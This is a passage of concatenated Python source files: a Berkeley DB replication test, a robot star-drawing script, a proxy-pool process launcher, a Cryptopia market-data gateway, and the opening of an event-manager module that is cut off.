| db.DB_INIT_LOG | db.DB_INIT_MPOOL | db.DB_INIT_LOCK |
db.DB_INIT_REP | db.DB_RECOVER | db.DB_THREAD, 0666)
self.confirmed_master=self.client_startupdone=False
def confirmed_master(a,b,c) :
if b==db.DB_EVENT_REP_MASTER :
self.confirmed_master=True
def client_startupdone(a,b,c) :
if b==db.DB_EVENT_REP_STARTUPDONE :
self.client_startupdone=True
self.dbenvMaster.set_event_notify(confirmed_master)
self.dbenvClient.set_event_notify(client_startupdone)
#self.dbenvMaster.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvMaster.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
#self.dbenvClient.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvClient.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
self.dbMaster = self.dbClient = None
def tearDown(self):
if self.dbClient :
self.dbClient.close()
if self.dbMaster :
self.dbMaster.close()
# Here we assign dummy event handlers to allow GC of the test object.
# Since the dummy handler doesn't use any outer scope variable, it
# doesn't keep any reference to the test object.
def dummy(*args) :
pass
self.dbenvMaster.set_event_notify(dummy)
self.dbenvClient.set_event_notify(dummy)
self.dbenvClient.close()
self.dbenvMaster.close()
test_support.rmtree(self.homeDirClient)
test_support.rmtree(self.homeDirMaster)
class DBReplicationManager(DBReplication) :
def test01_basic_replication(self) :
master_port = test_support.find_unused_port()
client_port = test_support.find_unused_port()
if db.version() >= (5, 2) :
self.site = self.dbenvMaster.repmgr_site("127.0.0.1", master_port)
self.site.set_config(db.DB_GROUP_CREATOR, True)
self.site.set_config(db.DB_LOCAL_SITE, True)
self.site2 = self.dbenvMaster.repmgr_site("127.0.0.1", client_port)
self.site3 = self.dbenvClient.repmgr_site("127.0.0.1", master_port)
self.site3.set_config(db.DB_BOOTSTRAP_HELPER, True)
self.site4 = self.dbenvClient.repmgr_site("127.0.0.1", client_port)
self.site4.set_config(db.DB_LOCAL_SITE, True)
d = {
db.DB_BOOTSTRAP_HELPER: [False, False, True, False],
db.DB_GROUP_CREATOR: [True, False, False, False],
db.DB_LEGACY: [False, False, False, False],
db.DB_LOCAL_SITE: [True, False, False, True],
db.DB_REPMGR_PEER: [False, False, False, False ],
}
for i, j in d.items() :
for k, v in \
zip([self.site, self.site2, self.site3, self.site4], j) :
if v :
self.assertTrue(k.get_config(i))
else :
self.assertFalse(k.get_config(i))
self.assertNotEqual(self.site.get_eid(), self.site2.get_eid())
self.assertNotEqual(self.site3.get_eid(), self.site4.get_eid())
for i, j in zip([self.site, self.site2, self.site3, self.site4], \
[master_port, client_port, master_port, client_port]) :
addr = i.get_address()
self.assertEqual(addr, ("127.0.0.1", j))
for i in [self.site, self.site2] :
self.assertEqual(i.get_address(),
self.dbenvMaster.repmgr_site_by_eid(i.get_eid()).get_address())
for i in [self.site3, self.site4] :
self.assertEqual(i.get_address(),
self.dbenvClient.repmgr_site_by_eid(i.get_eid()).get_address())
else :
self.dbenvMaster.repmgr_set_local_site("127.0.0.1", master_port)
self.dbenvClient.repmgr_set_local_site("127.0.0.1", client_port)
self.dbenvMaster.repmgr_add_remote_site("127.0.0.1", client_port)
self.dbenvClient.repmgr_add_remote_site("127.0.0.1", master_port)
self.dbenvMaster.rep_set_nsites(2)
self.dbenvClient.rep_set_nsites(2)
self.dbenvMaster.rep_set_priority(10)
self.dbenvClient.rep_set_priority(0)
self.dbenvMaster.rep_set_timeout(db.DB_REP_CONNECTION_RETRY,100123)
self.dbenvClient.rep_set_timeout(db.DB_REP_CONNECTION_RETRY,100321)
self.assertEqual(self.dbenvMaster.rep_get_timeout(
db.DB_REP_CONNECTION_RETRY), 100123)
self.assertEqual(self.dbenvClient.rep_get_timeout(
db.DB_REP_CONNECTION_RETRY), 100321)
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 100234)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 100432)
self.assertEqual(self.dbenvMaster.rep_get_timeout(
db.DB_REP_ELECTION_TIMEOUT), 100234)
self.assertEqual(self.dbenvClient.rep_get_timeout(
db.DB_REP_ELECTION_TIMEOUT), 100432)
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_RETRY, 100345)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_RETRY, 100543)
self.assertEqual(self.dbenvMaster.rep_get_timeout(
db.DB_REP_ELECTION_RETRY), 100345)
self.assertEqual(self.dbenvClient.rep_get_timeout(
db.DB_REP_ELECTION_RETRY), 100543)
self.dbenvMaster.repmgr_set_ack_policy(db.DB_REPMGR_ACKS_ALL)
self.dbenvClient.repmgr_set_ack_policy(db.DB_REPMGR_ACKS_ALL)
        self.dbenvMaster.repmgr_start(1, db.DB_REP_MASTER)
        self.dbenvClient.repmgr_start(1, db.DB_REP_CLIENT)
self.assertEqual(self.dbenvMaster.rep_get_nsites(),2)
self.assertEqual(self.dbenvClient.rep_get_nsites(),2)
self.assertEqual(self.dbenvMaster.rep_get_priority(),10)
self.assertEqual(self.dbenvClient.rep_get_priority(),0)
self.assertEqual(self.dbenvMaster.repmgr_get_ack_policy(),
db.DB_REPMGR_ACKS_ALL)
self.assertEqual(self.dbenvClient.repmgr_get_ack_policy(),
db.DB_REPMGR_ACKS_ALL)
# The timeout is necessary in BDB 4.5, since DB_EVENT_REP_STARTUPDONE
# is not generated if the master has no new transactions.
# This is solved in BDB 4.6 (#15542).
import time
        timeout = time.time()+60
        startup_timeout = False
while (time.time()<timeout) and not (self.confirmed_master and self.client_startupdone) :
time.sleep(0.02)
# self.client_startupdone does not always get set to True within
# the timeout. On windows this may be a deep issue, on other
# platforms it is likely just a timing issue, especially on slow
# virthost buildbots (see issue 3892 for more). Even though
# the timeout triggers, the rest of this test method usually passes
# (but not all of it always, see below). So we just note the
        # timeout on stderr and keep soldiering on.
if time.time()>timeout:
import sys
            print >> sys.stderr, ("XXX: timeout happened before "
"startup was confirmed - see issue 3892")
startup_timeout = True
d = self.dbenvMaster.repmgr_site_list()
self.assertEqual(len(d), 1)
d = d.values()[0] # There is only one
self.assertEqual(d[0], "127.0.0.1")
self.assertEqual(d[1], client_port)
self.assertTrue((d[2]==db.DB_REPMGR_CONNECTED) or \
(d[2]==db.DB_REPMGR_DISCONNECTED))
d = self.dbenvClient.repmgr_site_list()
self.assertEqual(len(d), 1)
d = d.values()[0] # There is only one
self.assertEqual(d[0], "127.0.0.1")
self.assertEqual(d[1], master_port)
self.assertTrue((d[2]==db.DB_REPMGR_CONNECTED) or \
(d[2]==db.DB_REPMGR_DISCONNECTED))
if db.version() >= (4,6) :
            d = self.dbenvMaster.repmgr_stat(flags=db.DB_STAT_CLEAR)
self.assertTrue("msgs_queued" in d)
self.dbMaster=db.DB(self.dbenvMaster)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.open("test", db.DB_HASH, db.DB_CREATE, 0666, txn=txn)
txn.commit()
import time,os.path
timeout=time.time()+10
while (time.time()<timeout) and \
not (os.path.exists(os.path.join(self.homeDirClient,"test"))) :
time.sleep(0.01)
self.dbClient=db.DB(self.dbenvClient)
while True :
txn=self.dbenvClient.txn_begin()
try :
self.dbClient.open("test", db.DB_HASH, flags=db.DB_RDONLY,
mode=0666, txn=txn)
except db.DBRepHandleDeadError :
txn.abort()
self.dbClient.close()
self.dbClient=db.DB(self.dbenvClient)
continue
txn.commit()
break
txn=self.dbenvMaster.txn_begin()
self.dbMaster.put("ABC", "123", txn=txn)
txn.commit()
import time
timeout=time.time()+10
v=None
while (time.time()<timeout) and (v is None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v is None :
time.sleep(0.02)
# If startup did not happen before the timeout above, then this test
# sometimes fails. This happens randomly, which causes buildbot
# instability, but all the other bsddb tests pass. Since bsddb3 in the
# stdlib is currently not getting active maintenance, and is gone in
# py3k, we just skip the end of the test in that case.
if time.time()>=timeout and startup_timeout:
self.skipTest("replication test skipped due to random failure, "
"see issue 3892")
self.assertTrue(time.time()<timeout)
self.assertEqual("123", v)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.delete("ABC", txn=txn)
txn.commit()
timeout=time.time()+10
while (time.time()<timeout) and (v is not None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v is None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEqual(None, v)
class DBBaseReplication(DBReplication) :
def setUp(self) :
DBReplication.setUp(self)
def confirmed_master(a,b,c) :
if (b == db.DB_EVENT_REP_MASTER) or (b == db.DB_EVENT_REP_ELECTED) :
self.confirmed_master = True
def client_startupdone(a,b,c) :
if b == db.DB_EVENT_REP_STARTUPDONE :
self.client_startupdone = True
self.dbenvMaster.set_event_notify(confirmed_master)
self.dbenvClient.set_event_notify(client_startupdone)
import Queue
self.m2c = Queue.Queue()
self.c2m = Queue.Queue()
# There are only two nodes, so we don't need to
# do any routing decision
def m2c(dbenv, control, rec, lsnp, envid, flags) :
self.m2c.put((control, rec))
def c2m(dbenv, control, rec, lsnp, envid, flags) :
self.c2m.put((control, rec))
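        # rep_set_transport(envid, callback) registers the function Berkeley
        # DB uses to ship replication messages; each callback here simply
        # enqueues the message so the peer's thread_do loop can replay it
        # through rep_process_message.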
self.dbenvMaster.rep_set_transport(13,m2c)
self.dbenvMaster.rep_set_priority(10)
self.dbenvClient.rep_set_transport(3,c2m)
self.dbenvClient.rep_set_priority(0)
self.assertEqual(self.dbenvMaster.rep_get_priority(),10)
self.assertEqual(self.dbenvClient.rep_get_priority(),0)
#self.dbenvMaster.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvMaster.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
#self.dbenvClient.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvClient.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
def thread_master() :
return self.thread_do(self.dbenvMaster, self.c2m, 3,
self.master_doing_election, True)
def thread_client() :
return self.thread_do(self.dbenvClient, self.m2c, 13,
self.client_doing_election, False)
from threading import Thread
t_m=Thread(target=thread_master)
t_c=Thread(target=thread_client)
import sys
if sys.version_info[0] < 3 :
t_m.setDaemon(True)
t_c.setDaemon(True)
else :
t_m.daemon = True
t_c.daemon = True
self.t_m = t_m
self.t_c = t_c
self.dbMaster = self.dbClient = None
self.master_doing_election=[False]
self.client_doing_election=[False]
def tearDown(self):
if self.dbClient :
self.dbClient.close()
if self.dbMaster :
self.dbMaster.close()
self.m2c.put(None)
self.c2m.put(None)
self.t_m.join()
self.t_c.join()
# Here we assign dummy event handlers to allow GC of the test object.
# Since the dummy handler doesn't use any outer scope variable, it
# doesn't keep any reference to the test object.
def dummy(*args) :
pass
self.dbenvMaster.set_event_notify(dummy)
self.dbenvClient.set_event_notify(dummy)
self.dbenvMaster.rep_set_transport(13,dummy)
self.dbenvClient.rep_set_transport(3,dummy)
self.dbenvClient.close()
self.dbenvMaster.close()
test_support.rmtree(self.homeDirClient)
test_support.rmtree(self.homeDirMaster)
def basic_rep_threading(self) :
self.dbenvMaster.rep_start(flags=db.DB_REP_MASTER)
self.dbenvClient.rep_start(flags=db.DB_REP_CLIENT)
def thread_do(env, q, envid, election_status, must_be_master) :
while True :
v=q.get()
if v is None : return
env.rep_process_message(v[0], v[1], envid)
self.thread_do = thread_do
self.t_m.start()
self.t_c.start()
def test01_basic_replication(self) :
self.basic_rep_threading()
# The timeout is necessary in BDB 4.5, since DB_EVENT_REP_STARTUPDONE
# is not generated if the master has no new transactions.
# This is solved in BDB 4.6 (#15542).
import time
timeout = time.time()+60
while (time.time()<timeout) and not (self.confirmed_master and
self.client_startupdone) :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.dbMaster=db.DB(self.dbenvMaster)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.open("test", db.DB_HASH, db.DB_CREATE, 0666, txn=txn)
txn.commit()
import time,os.path
timeout=time.time()+10
while (time.time()<timeout) and \
not (os.path.exists(os.path.join(self.homeDirClient,"test"))) :
time.sleep(0.01)
self.dbClient=db.DB(self.dbenvClient)
while True :
txn=self.dbenvClient.txn_begin()
try :
self.dbClient.open("test", db.DB_HASH, flags=db.DB_RDONLY,
mode=0666, txn=txn)
except db.DBRepHandleDeadError :
txn.abort()
self.dbClient.close()
self.dbClient=db.DB(self.dbenvClient)
continue
txn.commit()
break
        d = self.dbenvMaster.rep_stat(flags=db.DB_STAT_CLEAR)
self.assertTrue("master_changes" in d)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.put("ABC", "123", txn=txn)
txn.commit()
import time
timeout=time.time()+10
v=None
while (time.time()<timeout) and (v is None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v is None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEqual("123", v)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.delete("ABC", txn=txn)
txn.commit()
timeout=time.time()+10
while (time.time()<timeout) and (v is not None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v is None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEqual(None, v)
if db.version() >= (4,7) :
def test02_test_request(self) :
self.basic_rep_threading()
(minimum, maximum) = self.dbenvClient.rep_get_request()
self.dbenvClient.rep_set_request(minimum-1, maximum+1)
self.assertEqual(self.dbenvClient.rep_get_request(),
(minimum-1, maximum+1))
if db.version() >= (4,6) :
def test03_master_election(self) :
# Get ready to hold an election
#self.dbenvMaster.rep_start(flags=db.DB_REP_MASTER)
self.dbenvMaster.rep_start(flags=db.DB_REP_CLIENT)
self.dbenvClient.rep_start(flags=db.DB_REP_CLIENT)
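            # Both environments start as plain clients, so no site is master
            # yet; the election triggered below must promote one of them.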
def thread_do(env, q, envid, election_status, must_be_master) :
while True :
v=q.get()
if v is None : return
r = env.rep_process_message(v[0],v[1],envid)
if must_be_master and self.confirmed_master :
self.dbenvMaster.rep_start(flags = db.DB_REP_MASTER)
must_be_master = False
if r[0] == db.DB_REP_HOLDELECTION :
def elect() :
while True :
try :
env.rep_elect(2, 1)
election_status[0] = False
break
except db.DBRepUnavailError :
pass
if not election_status[0] and not self.confirmed_master :
from threading import Thread
election_status[0] = True
t=Thread(target=elect)
import sys
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
self.thread_do = thread_do
self.t_m.start()
self.t_c.start()
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 50000)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 50000)
self.client_doing_election[0] = True
while True :
try :
self.dbenvClient.rep_elect(2, 1)
self.client_doing_election[0] = False
break
except db.DBRepUnavailError :
pass
self.assertTrue(self.confirmed_master)
# Race condition showed up after upgrading to Solaris 10 Update 10
# https://forums.oracle.com/forums/thread.jspa?messageID=9902860
# jcea@jcea.es: See private email from Paula Bingham (Oracle),
# in 20110929.
while not (self.dbenvClient.rep_stat()["startup_complete"]) :
pass
if db.version() >= (4,7) :
def test04_test_clockskew(self) :
fast, slow = 1234, 1230
self.dbenvMaster.rep_set_clockskew(fast, slow)
self.assertEqual((fast, slow),
self.dbenvMaster.rep_get_clockskew())
self.basic_rep_threading()
#----------------------------------------------------------------------
def test_suite():
suite = unittest.TestSuite()
if db.version() >= (4, 6) :
dbenv = db.DBEnv()
try :
dbenv.repmgr_get_ack_policy()
ReplicationManager_available=True
except :
ReplicationManager_available=False
dbenv.close()
del dbenv
if ReplicationManager_available :
suite.addTest(unittest.makeSuite(DBReplicationManager))
if have_threads :
suite.addTest(unittest.makeSuite(DBBaseReplication))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
sketchStars.py
|
from threading import Thread
import WonderPy.core.wwMain
from WonderPy.core.wwConstants import WWRobotConstants
STAR_NUM_POINTS = 5
STAR_EDGE_LENGTH_CM = 50
class MyClass(object):
def on_connect(self, robot):
"""
start threads which emit robot commands based on their own timing, rather than in response to sensor packets.
"""
if not robot.has_ability(WWRobotConstants.WWRobotAbilities.BODY_MOVE, True):
exit(1)
Thread(target=self.async_1, args=(robot,)).start()
def async_1(self, robot):
while True:
print("Press the button!")
robot.block_until_button_main_press_and_release()
print("Resetting the pose global position to origin")
robot.cmds.body.do_pose(0, 0, 0, 0, WWRobotConstants.WWPoseMode.WW_POSE_MODE_SET_GLOBAL)
robot.cmds.accessory.do_sketchkit_pen_down()
global STAR_NUM_POINTS
global STAR_EDGE_LENGTH_CM
self.do_star(robot, STAR_NUM_POINTS, STAR_EDGE_LENGTH_CM)
robot.cmds.accessory.do_sketchkit_pen_up()
def do_star(self, robot, numPoints, edge_length):
if numPoints % 2 == 0:
print("can only do stars with an odd number of points")
return
        if numPoints < 3:
            print("Need at least 3 points for a star")
            return
turn_deg = 180.0 * (1.0 - 1.0 / numPoints)
half_internal = (180.0 - turn_deg) * 0.5
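        # For an n-pointed star the heading changes by 180*(1 - 1/n) degrees
        # at each vertex (144 for n=5); half_internal is half the remaining
        # interior angle, used to aim the first edge away from the center.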
speed = 20.0
# turn clockwise away from center by half of one full vertex angle
robot.cmds.body.do_pose(0, 0, -half_internal, 0.5, WWRobotConstants.WWPoseMode.WW_POSE_MODE_RELATIVE_COMMAND)
        for n in range(numPoints):
print("driving to vertex %d" % (n + 1))
robot.cmds.body.do_pose(0, edge_length, 0, edge_length / speed,
WWRobotConstants.WWPoseMode.WW_POSE_MODE_RELATIVE_COMMAND)
# turn counter-clockwise by one vertex angle
td = turn_deg
# if last vertex, turn an additional half vertex angle to restore the original orientation of the robot
if n == numPoints - 1:
td += half_internal
robot.cmds.body.do_pose(0, 0, td, 0.5, WWRobotConstants.WWPoseMode.WW_POSE_MODE_RELATIVE_COMMAND)
if __name__ == "__main__":
WonderPy.core.wwMain.start(MyClass())
|
main.py
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: main.py
   Description : runs the main function
Author : JHao
date: 2017/4/1
-------------------------------------------------
Change Activity:
2017/4/1:
-------------------------------------------------
"""
__author__ = 'JHao'
import sys
import signal
from multiprocessing import Process
sys.path.append('.')
sys.path.append('..')
from Api.ProxyApi import run as ProxyApiRun
from Schedule.ProxyValidSchedule import run as ValidRun
from Schedule.ProxyRefreshSchedule import run as RefreshRun
def run():
p_list = list()
p1 = Process(target=ProxyApiRun, name='ProxyApiRun')
p_list.append(p1)
p2 = Process(target=ValidRun, name='ValidRun')
p_list.append(p2)
p3 = Process(target=RefreshRun, name='RefreshRun')
p_list.append(p3)
def kill_child_processes(signum, frame):
for p in p_list:
p.terminate()
sys.exit(1)
signal.signal(signal.SIGTERM, kill_child_processes)
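    # A SIGTERM to the parent now tears down all three children explicitly;
    # marking them daemonic below also stops them if the parent dies first.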
for p in p_list:
p.daemon = True
p.start()
for p in p_list:
p.join()
if __name__ == '__main__':
run()
|
cryptopia.py
|
from befh.restful_api_socket import RESTfulApiSocket
from befh.exchanges.gateway import ExchangeGateway
from befh.market_data import L2Depth, Trade
from befh.util import Logger
from befh.instrument import Instrument
from befh.clients.sql_template import SqlClientTemplate
from functools import partial
from datetime import datetime
from threading import Thread
import time
class ExchGwApiCryptopia(RESTfulApiSocket):
"""
Exchange gateway RESTfulApi
"""
def __init__(self):
RESTfulApiSocket.__init__(self)
@classmethod
def get_content_field_name(cls):
return 'Data'
@classmethod
def get_timestamp_offset(cls):
return 1
@classmethod
def get_trades_timestamp_field_name(cls):
return 'Timestamp'
@classmethod
def get_bids_field_name(cls):
return 'Buy'
@classmethod
def get_asks_field_name(cls):
return 'Sell'
@classmethod
def get_order_book_price_field_name(cls):
return 'Price'
@classmethod
def get_order_book_volume_field_name(cls):
return 'Volume'
@classmethod
def get_trade_side_field_name(cls):
return 'Type'
@classmethod
def get_trade_price_field_name(cls):
return 'Price'
@classmethod
def get_trade_volume_field_name(cls):
return 'Amount'
@classmethod
def get_order_book_link(cls, instmt):
return "https://www.cryptopia.co.nz/api/GetMarketOrders/%s" % instmt.get_instmt_code()
@classmethod
def get_trades_link(cls, instmt):
return "https://www.cryptopia.co.nz/api/GetMarketHistory/%s" % (instmt.get_instmt_code())
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
l2_depth = L2Depth()
if not cls.get_content_field_name() in raw.keys():
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
raw = raw[cls.get_content_field_name()]
keys = list(raw.keys())
if cls.get_bids_field_name() in keys and \
cls.get_asks_field_name() in keys:
# Date time
l2_depth.date_time = datetime.utcnow().strftime("%Y%m%d %H:%M:%S.%f")
# Bids
bids = raw[cls.get_bids_field_name()]
bids = sorted(bids, key=lambda x: x[cls.get_order_book_price_field_name()], reverse=True)
            for i in range(min(5, len(bids))):
l2_depth.bids[i].price = bids[i][cls.get_order_book_price_field_name()]
l2_depth.bids[i].volume = bids[i][cls.get_order_book_volume_field_name()]
# Asks
asks = raw[cls.get_asks_field_name()]
asks = sorted(asks, key=lambda x: x[cls.get_order_book_price_field_name()])
            for i in range(min(5, len(asks))):
l2_depth.asks[i].price = asks[i][cls.get_order_book_price_field_name()]
l2_depth.asks[i].volume = asks[i][cls.get_order_book_volume_field_name()]
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return l2_depth
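    # The accessors above imply a response shaped roughly like this
    # (hypothetical sample, reconstructed from the field names used here):
    #   {"Data": {"Buy":  [{"Price": 0.021, "Volume": 1.5}, ...],
    #             "Sell": [{"Price": 0.022, "Volume": 0.8}, ...]}}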
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
keys = list(raw.keys())
if cls.get_trades_timestamp_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
cls.get_trade_volume_field_name() in keys:
# Date time
date_time = float(raw[cls.get_trades_timestamp_field_name()])
date_time = date_time / cls.get_timestamp_offset()
trade.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Trade side
trade.trade_side = Trade.parse_side(raw[cls.get_trade_side_field_name()])
# Trade price
trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
# Trade volume
trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
# Trade id
trade.trade_id = trade.date_time + '-P' + str(trade.trade_price) + '-V' + str(trade.trade_volume)
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
@classmethod
def get_order_book(cls, instmt):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
res = cls.request(cls.get_order_book_link(instmt))
if len(res) > 0:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt):
"""
Get trades
:param instmt: Instrument
:param trade_id: Trade id
:return: List of trades
"""
link = cls.get_trades_link(instmt)
res = cls.request(link)
trades = []
if len(res) > 0 and cls.get_content_field_name() in res.keys():
for t in res[cls.get_content_field_name()]:
trade = cls.parse_trade(instmt=instmt,
raw=t)
trades.append(trade)
return trades
class ExchGwCryptopia(ExchangeGateway):
"""
Exchange gateway
"""
def __init__(self, db_clients):
"""
Constructor
:param db_client: Database client
"""
ExchangeGateway.__init__(self, ExchGwApiCryptopia(), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Cryptopia'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(1)
def get_trades_worker(self, instmt):
"""
Get order book worker thread
:param instmt: Instrument name
"""
while True:
try:
ret = self.api_socket.get_trades(instmt)
if ret is None or len(ret) == 0:
time.sleep(1)
continue
            except Exception as e:
                Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
                time.sleep(1)
                continue
for trade in ret:
assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
assert isinstance(instmt.get_exch_trade_id(), str), \
"instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
if trade.trade_id > instmt.get_exch_trade_id():
instmt.set_exch_trade_id(trade.trade_id)
self.insert_trade(instmt, trade)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
time.sleep(1)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
instmt.set_recovered(False)
t1 = Thread(target=partial(self.get_order_book_worker, instmt))
t2 = Thread(target=partial(self.get_trades_worker, instmt))
t1.start()
t2.start()
return [t1, t2]
if __name__ == '__main__':
Logger.init_log()
exchange_name = 'Cryptopia'
instmt_name = 'DOTBTC'
instmt_code = 'DOT_BTC'
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_client = SqlClientTemplate()
exch = ExchGwCryptopia([db_client])
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_recovered(False)
# exch.get_order_book_worker(instmt)
exch.get_trades_worker(instmt)
|
events.py
|
"""Leaf 事件机制实现"""
import threading
import multiprocessing as mp
from collections import namedtuple
from typing import Optional, List, Callable, NoReturn
from . import modules
from .error import Error
from .wrapper import thread
from .algorithm import Node, Tree
class ReachedMaxReg(Error):
    """Maximum number of registrations reached"""
    code = 10011
    description = "Maximum number of registered callbacks reached"
class InvalidRootName(Error):
    """Invalid root node name"""
    code = 10012
    description = "Invalid root node name"
class InvalidEventName(Error):
    """Invalid event name"""
    code = 10013
    description = "Invalid event name"
class EventNotFound(Error):
    """No matching event found"""
    code = 10014
    description = "No matching event found"
# Describes the parameters an event expects when invoked:
# args - positional parameters: (int, str, ...)
# kwargs - keyword parameters: {"sth1": int, "sth2": str, ...}
Parameters = namedtuple("Parameters", ("args", "kwargs"))
class Event:
"""
事件类:
name - 事件名
hook - 注册回调函数到当前事件
unhook - 取消注册回调函数从当前事件
"""
def __repr__(self) -> str:
"""返回 repr 信息"""
return "<Leaf EventObject '" + self.name + "'>"
def __init__(self, name: str, paras: Parameters,
description: Optional[str] = '',
maximum: Optional[int] = 0):
"""
事件类初始化函数:
parameters - 事件被调用时的参数说明
name - 该事件的类型: 请遵循 Leaf 中事件名称规定
description - 事件说明
maximum - 最大允许注册的回调函数数量: 默认为 0 - 无限
"""
self.__name: str = name
self.__maximum: int = maximum
self.__parameters: Parameters = paras
self.__description: str = description
self.__callbacks: List[Callable] = list()
def __str__(self):
"""str 返回事件的说明"""
return self.__description
@property
def name(self) -> str:
"""返回事件名称"""
return self.__name
@property
def description(self) -> str:
"""返回事件说明"""
return self.__description
def hook(self, function: Callable) -> NoReturn:
"""
注册一个函数到当前的事件:
function: 在事件被触发时可以被调用的任意函数
"""
if (self.__maximum == 0) or (len(self.__callbacks) < self.__maximum):
self.__callbacks.append(function)
else:
raise ReachedMaxReg(
"Reached max registery of event: " + str(self.__maximum))
def unhook(self, function: Callable) -> NoReturn:
"""
从注册事件中删除一个函数:
function: 待删除的函数
*注意: 当未找到对应函数时不会触发错误
"""
if function in self.__callbacks:
self.__callbacks.remove(function)
def boardcast(self, *args, **kwargs) -> NoReturn:
"""
向所有的进程广播触发该事件
经过广播的事件请不要再次在本地 notify
"""
manager: Manager = modules.events
manager.boardcast(self.__name, *args, **kwargs)
@thread
def notify(self, *args, **kwargs) -> NoReturn:
"""
向所有绑定了当前事件的函数发送通知:
传入的所有参数会原封不动的传入被调用函数
函数的返回值将会被丢弃
"""
for function in self.__callbacks:
function(*args, **kwargs)
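# Minimal usage sketch (names are illustrative, not part of this module):
#   paras = Parameters(args=(int,), kwargs={})
#   updated = Event("leaf.plugins.demo.updated", paras, "demo event")
#   updated.hook(print)
#   updated.notify(42)   # every hooked callback runs in a worker thread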
class Manager:
"""
事件管理 - 根据传入事件名建立事件区域树
请遵循 leaf 事件名规则:
所有的事件需要以 leaf 作为开头
而后的标识符说明自己的功能区域, 如 plugins
之后说明自己的业务名称, 如 access_token
后面添加自定义的事件名, 如 updated
得到的事件名: leaf.plugins.access_token.updated
add - 向管理器中添加一个事件
event - 尝试从指定路径获取一个事件
names - 尝试从指定路径获取子集下的所有事件名称与说明
"""
def __repr__(self) -> str:
"""返回 repr 信息"""
return "<Leaf EventManager '%s'>" % self.__rootname
def __init__(self, rootname: Optional[str] = "leaf",
asyncs: Optional[mp.Queue] = None):
"""
初始化事件管理器:
rootname: 根管理器名称
asyncs: 调度服务器远程事件同步队列
"""
self.__asyncs: mp.Queue = asyncs
self.__rootname: str = rootname
self.__rootnode: Node = Node(rootname)
self.__events_tree: Tree = Tree(self.__rootnode)
        # Start the broadcast listener thread
if self.__asyncs:
listener = threading.Thread(target=self.__listen_boardcast)
            listener.daemon = True
listener.start()
def __split(self, name: str, splitor: str) -> list:
